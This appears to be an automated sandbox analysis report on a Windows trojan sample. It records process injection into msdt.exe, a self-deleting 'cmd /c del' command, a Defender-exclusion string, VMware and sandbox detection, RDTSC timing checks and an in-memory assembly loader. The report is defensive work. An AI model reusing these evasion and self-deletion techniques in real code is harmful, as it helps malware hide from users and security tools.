          Source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000000.264881846.0000000000402000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000005.00000002.363189581.000000000100F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: divpCHa0h7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: divpCHa0h7.exeVirustotal: Detection: 16%
          Source: divpCHa0h7.exeReversingLabs: Detection: 17%
          Source: divpCHa0h7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\divpCHa0h7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\divpCHa0h7.exe 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Users\user\Desktop\divpCHa0h7.exe C:\Users\user\Desktop\divpCHa0h7.exe
          Source: C:\Users\user\Desktop\divpCHa0h7.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@8/5
          Source: C:\Users\user\Desktop\divpCHa0h7.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\divpCHa0h7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: divpCHa0h7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: divpCHa0h7.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
          Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Unpacked PE file: 5.2.divpCHa0h7.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
          .NET source code contains potential unpacker
          Source: divpCHa0h7.exe, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.0.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.2.divpCHa0h7.exe.690000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.divpCHa0h7.exe.140000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.0.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 4.2.divpCHa0h7.exe.3a0000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.divpCHa0h7.exe.400000.0.unpack, MapEditor1/CreateMapDialog.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_006971C7 push 00000014h; iretd
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106203B push ebx; retf
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 3_2_001471C7 push 00000014h; iretd
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 4_2_003A71C7 push 00000014h; iretd
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B1D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B832 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B83B push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B89C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B7E5 push eax; ret
          Source: initial sample | Static PE information: section name: .text entropy: 7.77424395601

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.2b01658.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: divpCHa0h7.exe PID: 3240, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000002768614 second address: 000000000276861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 00000000027689AE second address: 00000000027689B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2540 | Thread sleep time: -30091s >= -30000s
          Source: C:\Users\user\Desktop\divpCHa0h7.exe TID: 2840 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5240 | Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Thread delayed: delay time: 30091
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Thread delayed: delay time: 922337203685477
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.294005311.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.304751449.0000000003767000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000000.301545484.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000006.00000000.305488010.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000006.00000000.294080069.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FD14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FAC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F96C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD1C06 mov eax, dword ptr fs:[00000030h]
